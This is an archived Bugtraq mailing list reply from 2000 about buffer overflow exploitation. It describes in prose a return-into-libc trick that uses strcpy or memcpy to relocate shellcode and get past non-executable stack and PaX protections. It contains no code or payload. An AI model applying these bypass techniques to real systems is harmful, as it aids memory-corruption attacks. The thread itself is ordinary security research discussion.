Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Future of buffer overflows ?
From: tseeker () probemail com
Date: Thu, 2 Nov 2000 04:13:53 -600

Feed a return address and arguments so the RET "calls" memcpy >(),
and use this memcpy() to move the buffer to some place in
memory where
you can jump latter. Then tell memcpy() to return to this new > place,clarifying:
memcpy needs an argument specifying the amount of bytes to
copy. It will contain 0, so you will have problems with putting
it on the stack. strcpy() is a better choice. This technique
was first described (some years ago) in "Defeating Solar
Designer non-executable stack patch" by Nergal
check it out, the second method can be used to bypass Pax
protection as well. It additionally deals with the case when
libc is mapped into a region with address which begins with NULL.

The second option... let's call it "pop&ret"
That is pretty cool.

The Seeker

ProbeMail / http://www.probemail.com

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]